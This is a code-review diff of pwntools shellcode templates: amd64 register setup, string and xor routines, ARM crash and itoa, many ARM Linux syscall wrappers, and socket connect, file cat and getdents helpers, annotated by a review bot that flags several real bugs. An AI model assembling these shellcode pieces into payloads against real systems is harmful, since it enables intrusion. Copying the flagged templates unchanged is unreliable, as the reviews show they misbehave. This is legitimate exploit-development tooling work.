--git a/pwnlib/shellcraft/templates/amd64/setregs.asm b/pwnlib/shellcraft/templates/amd64/setregs.asm index 8521c9726..c3e5f140c 100644 --- a/pwnlib/shellcraft/templates/amd64/setregs.asm +++ b/pwnlib/shellcraft/templates/amd64/setregs.asm @@ -1,6 +1,6 @@ <% from pwnlib.regsort import regsort - from pwnlib.shellcraft import registers + from pwnlib.shellcraft import registers, eval from pwnlib.shellcraft.amd64 import mov %> <%page args="reg_context, stack_allowed = True"/> 
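Review bot: `isinstance(array, (str))` in pushstr_array.asm tests against plain `str` — the parentheses do not make a tuple — so a `unicode` argument (which push.asm in this same patch accepts via `(str, unicode)`) presumably falls through to the list path and is iterated character by character; write `isinstance(array, (str, unicode))` if that is intended. `array_str = ''` two lines further down is dead, as it is rebuilt from the normalized list. A doctest showing the resulting stack layout for a two-element list would also help, since the `offset` arithmetic is the only non-obvious part of the template.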
@@ -16,18 +16,57 @@ Example: >>> print shellcraft.setregs({'rax':1, 'rbx':'rax'}).rstrip() mov rbx, rax - push 0x1 + push 1 + pop rax + >>> print shellcraft.setregs({'rax': 'SYS_write', 'rbx':'rax'}).rstrip() + mov rbx, rax + push (SYS_write) /* 1 */ pop rax >>> print shellcraft.setregs({'rax':'rbx', 'rbx':'rax', 'rcx':'rbx'}).rstrip() mov rcx, rbx xchg rax, rbx + >>> print shellcraft.setregs({'rax':1, 'rdx':0}).rstrip() + push 1 + pop rax + cdq /* rdx=0 */ +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} + +eax = reg_context.get('rax', None) +edx = reg_context.get('rdx', None) +cdq = False + +if isinstance(eax, str): + try: + eax = eval(eax) + except NameError: + pass -% for how, src, dst in regsort(reg_context, registers.amd64): +if isinstance(edx, str): + try: + edx = eval(edx) + except NameError: + pass + +if isinstance(eax, int) and isinstance(edx, int) and eax >> 63 == edx: + cdq = True + reg_context.pop('rdx') + +sorted_regs = regsort(reg_context, registers.amd64) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, src, dst in sorted_regs: % if how == 'xchg': xchg ${src}, ${dst} % else: ${mov(src, dst)} % endif % endfor +% if cdq: + cdq /* rdx=0 */ +% endif +% endif diff --git a/pwnlib/shellcraft/templates/amd64/strcpy.asm b/pwnlib/shellcraft/templates/amd64/strcpy.asm new file mode 100644 index 000000000..b193c07f6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/strcpy.asm 
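Review bot: The `cdq` shortcut in setregs.asm is taken on `eax >> 63 == edx`, but `cdq` sign-extends bit 31 of eax into edx (and rdx is zero-extended from there), so for `rax` in `[2**31, 2**63)` the test passes with `edx == 0` while the emitted `cdq` leaves rdx = 0xffffffff, and for `rax == -1`, `rdx == -1` it emits `cdq /* rdx=0 */` yielding rdx = 0x00000000ffffffff rather than -1. Restrict the shortcut to the case the comment promises: `if isinstance(eax, int) and edx == 0 and 0 <= eax < 2**31:`. The doctest `setregs({'rax':1, 'rdx':0})` still passes with that condition.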
@@ -0,0 +1,32 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.amd64 import mov, pushstr, setregs +from pwnlib import constants +%> +<%docstring> +Copies a string + +Example: + + >>> sc = 'jmp get_str\n' + >>> sc += 'pop_str: pop rax\n' + >>> sc += shellcraft.amd64.strcpy('rsp', 'rax') + >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 32) + >>> sc += shellcraft.amd64.linux.exit(0) + >>> sc += 'get_str: call pop_str\n' + >>> sc += '.asciz "Hello, world\\n"' + >>> run_assembly(sc).recvline() + 'Hello, world\n' + +<%page args="dst, src"/> + ${setregs({'rcx': -1, + 'rdi': src, + 'rsi': dst, + 'rax': 0})} + push rdi + repnz scas al, BYTE PTR [rdi] + pop rdi + xchg rdi, rsi + inc rcx + neg rcx + rep movs BYTE PTR [rdi], BYTE PTR [rsi] diff --git a/pwnlib/shellcraft/templates/amd64/strlen.asm b/pwnlib/shellcraft/templates/amd64/strlen.asm new file mode 100644 index 000000000..5191d4c8f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/strlen.asm @@ -0,0 +1,35 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.amd64 import mov, pushstr, setregs +from pwnlib import constants +%> +<%docstring> +Calculate the length of the specified string. + +Arguments: + string(str): Register or address with the string + reg(str): Named register to return the value in, + rcx is the default. + +Example: + + >>> sc = 'jmp get_str\n' + >>> sc += 'pop_str: pop rdi\n' + >>> sc += shellcraft.amd64.strlen('rdi', 'rax') + >>> sc += 'push rax;' + >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 8) + >>> sc += shellcraft.amd64.linux.exit(0) + >>> sc += 'get_str: call pop_str\n' + >>> sc += '.asciz "Hello, world\\n"' + >>> run_assembly(sc).unpack() == len('Hello, world\n') + True + +<%page args="string, reg='rcx'"/> + ${setregs({'rcx': -1, + 'rdi': string, + 'rax': 0})} + repnz scas al, BYTE PTR [rdi] + inc rcx + inc rcx + neg rcx + ${mov(reg, 'rcx')} 
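Review bot: strcpy.asm's docstring has no Arguments section, and the generated code has preconditions a caller must know: `dst` must have room for strlen(`src`)+1 bytes (the `rep movs` copies the terminator with no bound), the direction flag must be clear (no `cld` is emitted, unlike memcpy.asm), and rax, rcx, rdi and rsi are all clobbered via `setregs` and the string instructions. Suggest adding `Arguments:` entries for `dst(str)` and `src(str)` plus a line `Clobbers rax, rcx, rdi, rsi; assumes DF=0.`. strlen.asm in the next file section has the same gap (rax, rcx, rdi clobbered; DF assumed clear) and could carry the same note.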
diff --git a/pwnlib/shellcraft/templates/amd64/xor.asm b/pwnlib/shellcraft/templates/amd64/xor.asm
new file mode 100644
index 000000000..e9a9b6f32
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/xor.asm
@@ -0,0 +1,82 @@ +<% + from pwnlib.shellcraft import pretty, common, amd64, registers + from pwnlib.util.packing import pack, unpack + from pwnlib.context import context as ctx + from pwnlib.log import getLogger +%> +<%page args="key, address, count"/> +<%docstring> +XORs data a constant value. + +Args: + key (int,str): XOR key either as a 8-byte integer, + If a string, length must be a power of two, + and not longer than 8 bytes. + Alternately, may be a register. + address (int): Address of the data (e.g. 0xdead0000, 'esp') + count (int): Number of bytes to XOR, or a register containing + the number of bytes to XOR. + +Example: + + >>> sc = shellcraft.read(0, 'rsp', 32) + >>> sc += 'mov rbx, [rsp]\n' + >>> sc += 'mov rdx, rax' + >>> sc += shellcraft.xor('rbx', 'rsp', 'rax') + >>> sc += shellcraft.write(1, 'rsp', 'rdx') + >>> io = run_assembly(sc) + >>> io.send(cyclic(32)) + >>> io.recv() == xor(cyclic(context.bytes), cyclic(32)) + True + +<% +log = getLogger('pwnlib.shellcraft.templates.amd64.xor') + +# By default, assume the key is a register +key_size = ctx.bytes +key_pretty = key + +key_register = registers.get_register(key) + +if key_register: + assert key_register.bytes == ctx.bytes +else: + key_str = key + key_int = key + + if isinstance(key, int): + key_str = pack(key, bytes=4) + else: + key_int = unpack(key, 'all') + + if len(key_str) > ctx.bytes: + log.error("Key %s is too large (max %i bytes)" % (pretty(key), ctx.bytes)) + + if len(key_str) not in (1,2,4): + log.error("Key length must be a power of two (got %s)" % pretty(key)) + + key_size = len(key_str) + key_pretty = pretty(key_int) + +if count == 0 or key_size == 0: + return '/* noop xor */' + +start = common.label('start') + +## Determine the move size +word_name = {1:'BYTE', 2:'WORD', 4:'DWORD', 8:'QWORD'}[key_size] + +## Set up the register context +regctx = {'rax': count, 'rcx': address} +if key_register and key_register.name in regctx: + regctx['rbx'] = key + key_pretty = 'rbx' +%> + /* 
xor(${pretty(key)}, ${pretty(address)}, ${pretty(count)}) */ + ${amd64.setregs(regctx)} + add rax, rcx +${start}: + xor ${word_name} PTR [rcx], ${key_pretty} + add rcx, ${key_size} + cmp rcx, rax + jb ${start} diff --git a/pwnlib/shellcraft/templates/arm/crash.asm b/pwnlib/shellcraft/templates/arm/crash.asm new file mode 100644 index 000000000..f02102f8e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/crash.asm @@ -0,0 +1,12 @@ +<% from pwnlib.shellcraft.arm import mov %> +<%docstring> +Crash. + +Example: + + >>> run_assembly(shellcraft.crash()).poll(True) + -11 + + pop {r0-r12,lr} + ${mov('sp', 0)} + add pc, sp, #0 diff --git a/pwnlib/shellcraft/templates/arm/itoa.asm b/pwnlib/shellcraft/templates/arm/itoa.asm new file mode 100644 index 000000000..91c87b724 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/itoa.asm 
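Review bot: The loop at the end of xor.asm advances `rcx` by `key_size` and only exits once `rcx >= rax`, so a `count` that is not a multiple of the key size XORs up to key_size-1 bytes past `address + count`; either document `count must be a multiple of the key size` in the docstring or round the count down before the loop. The docstring also says an int key is an 8-byte integer and a string key may be up to 8 bytes, but the code packs ints with `pack(key, bytes=4)` and rejects `len(key_str) not in (1,2,4)`, so an 8-byte immediate key is never accepted and only a register key reaches the QWORD case; the text should say 1, 2 or 4 bytes, or a register. Lastly `assert key_register.bytes == ctx.bytes` is input validation that disappears under `python -O`; use the `log.error(...)` already set up a few lines earlier.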
@@ -0,0 +1,75 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.arm import mov, pushstr, udiv_10, setregs +from pwnlib import constants +%> +<%docstring> +Converts an integer into its string representation, and pushes it +onto the stack. Uses registers r0-r5. + +Arguments: + v(str, int): + Integer constant or register that contains the value to convert. + alloca + +Example: + + >>> sc = shellcraft.arm.mov('r0', 0xdeadbeef) + >>> sc += shellcraft.arm.itoa('r0') + >>> sc += shellcraft.arm.linux.write(1, 'sp', 32) + >>> run_assembly(sc).recvuntil('\x00') + '3735928559\x00' + +<%page args="v, buffer='sp', allocate_stack=True"/> +<% +itoa_loop = common.label('itoa_loop') +size_loop = common.label('size_loop') +one_char = common.label('one_char') +assert v in registers.arm +%>\ + /* atoi(${pretty(v,0)}) */ +%if allocate_stack and buffer=='sp': + sub sp, sp, 0x10 +%endif +## REGISTER USAGE +## +## r0: Value (also used in udiv_10) +## r1: Used in udiv_10 +## r2: Used in udiv_10 +## r3: Length of string, current character +## r4: Buffer pointer +## r5: Remainder + ${setregs({'r0': v, + 'r3': 0, + 'r4': buffer})} +## Save for later + push {r0} +## Calculate how many characters are needed. +## e.g. 0 -> 1 +## 1 -> 1 +## 23 -> 2 +## 1234 -> 4 +${size_loop}: + add r3, r3, 1 + ${udiv_10('r0')} + cmp r0, 1 + bhs ${size_loop} +## Calculate the end of the buffer and null-terminate +## N.B. r0 == 0 here + add r3, r4, r3 + strb r0, [r3, #1] +## Grab saved "original value" off the stack + pop {r0} +${itoa_loop}: + ${mov('r5', 'r0')} /* save before division */ + ${udiv_10('r0')} +## Multiply back by 10 to get remainder + /* multiply by 10 to get remainder in r5 */ + ${mov('r1', 10)} + umull r1, r2, r1, r0 + sub r5, r5, r1 + /* store the byte, decrement, check complete */ + add r5, r5, ${ord('0')} + strb r5, [r3, #-1]! + cmp r3, r4 + bgt ${itoa_loop} 
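Review bot: In itoa.asm the terminator store `strb r0, [r3, #1]` writes to `r4 + length + 1`, while the digit loop fills `r4` .. `r4 + length - 1` and stops when `r3` reaches `r4`, so the byte at `r4 + length` is left untouched and the doctest passes only if that stack byte already happens to be zero; `strb r0, [r3]` looks like the intended store — worth confirming with a non-zeroed buffer. The emitted comment `/* atoi(${pretty(v,0)}) */` names the wrong function (`itoa`). The docstring promises `Integer constant or register` for `v`, but `assert v in registers.arm` accepts only registers and is stripped under `-O`; either accept constants (the `setregs` call presumably handles them already) or reject them explicitly, and the dangling `alloca` entry should document the real `buffer` and `allocate_stack` arguments.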
diff --git a/pwnlib/shellcraft/templates/arm/linux/accept.asm b/pwnlib/shellcraft/templates/arm/linux/accept.asm new file mode 100644 index 000000000..b9fc47e61 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/access.asm b/pwnlib/shellcraft/templates/arm/linux/access.asm new file mode 100644 index 000000000..0abd78bbd --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/arm/linux/acct.asm b/pwnlib/shellcraft/templates/arm/linux/acct.asm new file mode 100644 index 000000000..fdae78f43 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/arm/linux/alarm.asm b/pwnlib/shellcraft/templates/arm/linux/alarm.asm new file mode 100644 index 000000000..54e0def09 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/alarm.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/arm/linux/bind.asm b/pwnlib/shellcraft/templates/arm/linux/bind.asm new file mode 100644 index 000000000..20a09c555 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/brk.asm b/pwnlib/shellcraft/templates/arm/linux/brk.asm new file mode 100644 index 000000000..e8f134333 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/arm/linux/cacheflush.asm b/pwnlib/shellcraft/templates/arm/linux/cacheflush.asm new file mode 100644 index 000000000..e51dc2d80 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/cacheflush.asm 
@@ -0,0 +1,31 @@ +<%docstring> +Invokes the cache-flush operation, without using any NULL or newline bytes. + +Effectively is just: + + mov r0, #0 + mov r1, #-1 + mov r2, #0 + swi 0x9F0002 + +How this works: + + ... However, SWI generates a software interrupt and to the + interrupt handler, 0x9F0002 is actually data and as a result will + not be read via the instruction cache, so if we modify the argument + to SWI in our self-modifyign code, the argument will be read + correctly. + + adr r6, cacheflush + movw r5, 0xffff + add r5, r5, 3 + strh r5, [r6] + eor r7, r7, r7 + push {r7, lr} + sub r7, r7, #1 + push {r7} + add r7, r7, #1 + push {r7} + pop {r0, r1, r2, lr} +cacheflush: + swimi 0x9f4141 diff --git a/pwnlib/shellcraft/templates/arm/linux/cat.asm b/pwnlib/shellcraft/templates/arm/linux/cat.asm new file mode 100644 index 000000000..3da5b7e73 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/cat.asm @@ -0,0 +1,19 @@ +<% + from pwnlib import constants + from pwnlib.shellcraft import arm +%> +<%page args="filename, fd=1"/> +<%docstring> +Opens a file and writes its contents to the specified file descriptor. + +Example: + + >>> f = tempfile.mktemp() + >>> write(f, 'FLAG\n') + >>> run_assembly(shellcraft.arm.linux.cat(f)).recvline() + 'FLAG\n' + + + ${arm.pushstr(filename)} + ${arm.linux.open('sp', 0, int(constants.O_RDONLY))} + ${arm.linux.sendfile(fd, 'r0', 0, 0x7fffffff)} diff --git a/pwnlib/shellcraft/templates/arm/linux/chdir.asm b/pwnlib/shellcraft/templates/arm/linux/chdir.asm new file mode 100644 index 000000000..794d92b41 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} 
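Review bot: cacheflush.asm patches its own `swimi` operand with `strh r5, [r6]`, so it only runs where the code page is writable (RWX shellcode, not a normal text segment); the docstring explains the trick but should state that requirement, and that r5, r6 and r7 are clobbered. Typo in the docstring: `self-modifyign` → `self-modifying`.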
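Review bot: `arm.linux.open('sp', 0, int(constants.O_RDONLY))` in cat.asm passes `O_RDONLY` in the third position and a literal `0` as the second; if `open` takes `(file, oflag, mode)` as the generated syscall wrappers suggest, this works only because `O_RDONLY == 0` and reads as if the arguments were swapped — `arm.linux.open('sp', int(constants.O_RDONLY), 0)` says what is meant. The doctest uses `tempfile.mktemp()`, which returns a name only and is race-prone; `tempfile.mkstemp()` (closing the fd) creates the file safely.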
diff --git a/pwnlib/shellcraft/templates/arm/linux/chmod.asm b/pwnlib/shellcraft/templates/arm/linux/chmod.asm new file mode 100644 index 000000000..303774e2e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/chown.asm b/pwnlib/shellcraft/templates/arm/linux/chown.asm new file mode 100644 index 000000000..5afca31b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/arm/linux/chroot.asm b/pwnlib/shellcraft/templates/arm/linux/chroot.asm new file mode 100644 index 000000000..8c2751958 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clock_getres.asm b/pwnlib/shellcraft/templates/arm/linux/clock_getres.asm new file mode 100644 index 000000000..e5aa96315 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clock_getres.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/arm/linux/clock_gettime.asm new file mode 100644 index 000000000..66f7ee213 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/arm/linux/clock_nanosleep.asm new file mode 100644 index 000000000..e3f1f75d2 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clock_settime.asm b/pwnlib/shellcraft/templates/arm/linux/clock_settime.asm new file mode 100644 index 000000000..75f7f6cd5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clock_settime.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clone.asm b/pwnlib/shellcraft/templates/arm/linux/clone.asm new file mode 100644 index 000000000..84ad27eb7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/close.asm b/pwnlib/shellcraft/templates/arm/linux/close.asm new file mode 100644 index 000000000..8189d7dea --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/arm/linux/connect.asm b/pwnlib/shellcraft/templates/arm/linux/connect.asm new file mode 100644 index 000000000..640f41291 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/connect.asm 
@@ -0,0 +1,26 @@ +<% + from pwnlib.shellcraft.arm import push, mov, pushstr + from pwnlib.shellcraft.arm.linux import syscall + from pwnlib.constants import SOCK_STREAM, SYS_socket, SYS_connect + from pwnlib.util.net import sockaddr +%> +<%page args="host, port, network='ipv4'"/> +<%docstring> + Connects to the host on the specified port. + Network is either 'ipv4' or 'ipv6'. + Leaves the connected socket in R6. + +<% + sockaddr, addr_len, address_family = sockaddr(host, port, network) +%>\ +/* open new socket */ + ${syscall(SYS_socket, address_family, SOCK_STREAM, 0)} + +/* save opened socket */ + ${mov('r6', 'r0')} + +/* push sockaddr, connect() */ + ${pushstr(sockaddr, False)} + ${syscall(SYS_connect, 'r6', 'sp', addr_len)} + +/* Socket that is maybe connected is in r6 */ diff --git a/pwnlib/shellcraft/templates/arm/linux/creat.asm b/pwnlib/shellcraft/templates/arm/linux/creat.asm new file mode 100644 index 000000000..8dbc754d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/dir.asm b/pwnlib/shellcraft/templates/arm/linux/dir.asm new file mode 100644 index 000000000..f10e0dda8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/dir.asm 
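Review bot: Neither the socket() nor the connect() result is checked in connect.asm, so r6 can hold a negative errno (socket failed) or an unconnected descriptor, which contradicts the docstring's `Leaves the connected socket in R6.` while the closing comment concedes the socket is only `maybe connected`. Either align the docstring with the comment, e.g. `Leaves the socket in R6; neither socket() nor connect() is error-checked, so r0 after the connect() call holds its status.`, or add a `cmp r0, 0` / `blt` to an error label after each syscall. It is also worth a docstring line that `sockaddr(host, port, network)` resolves the address when the shellcode is generated, so a hostname is baked in as whatever it resolved to at that moment (presumably the same holds for the other architectures' connect templates).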
@@ -0,0 +1,21 @@ +<% from pwnlib.shellcraft import arm, pretty, common %> +<%page args="in_fd = 'r6', size = 0x800, allocate_stack = True"/> +<%docstring> Reads to the stack from a directory. + +Args: + in_fd (int/str): File descriptor to be read from. + size (int): Buffer size. + allocate_stack (bool): allocate 'size' bytes on the stack. + +You can optioanlly shave a few bytes not allocating the stack space. + +The size read is left in eax. + +<% + getdents_loop = common.label('getdents_loop') +%> +%if allocate_stack: + sub sp, sp, ${pretty(size)} +%endif +${getdents_loop}: + ${arm.linux.getdents(in_fd, 'sp', size)} diff --git a/pwnlib/shellcraft/templates/arm/linux/dup.asm b/pwnlib/shellcraft/templates/arm/linux/dup.asm new file mode 100644 index 000000000..a5b143fa2 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/dup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/arm/linux/dup2.asm b/pwnlib/shellcraft/templates/arm/linux/dup2.asm new file mode 100644 index 000000000..92fc73722 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/arm/linux/dup3.asm b/pwnlib/shellcraft/templates/arm/linux/dup3.asm new file mode 100644 index 000000000..77bf5966c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/dup3.asm 
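Review bot: The docstring in dir.asm says `The size read is left in eax.`, which is the x86 return register; on ARM the syscall result comes back in r0, so this should read `The number of bytes read is left in r0.` (and `optioanlly` should be `optionally`). The label is named `getdents_loop`, but nothing branches back to it, so the template performs a single getdents call; either rename the label or drop it unless a loop is actually intended (the variants for the other architectures are not visible here to compare). `sub sp, sp, ${pretty(size)}` has no matching release either, so the docstring should say that the caller owns that stack space afterwards.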
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/echo.asm b/pwnlib/shellcraft/templates/arm/linux/echo.asm new file mode 100644 index 000000000..ce9f6add7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/echo.asm @@ -0,0 +1,14 @@ +<% from pwnlib.shellcraft import arm %> +<%page args="string, sock = '1'"/> +<%docstring> +Writes a string to a file descriptor + +Example: + + >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() + 'hello\n' + + + +${arm.pushstr(string, append_null = False)} +${arm.linux.syscall('SYS_write', sock, 'sp', len(string))} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_create.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_create.asm new file mode 100644 index 000000000..a89b0058b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_create1.asm new file mode 100644 index 000000000..72bb36257 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} 
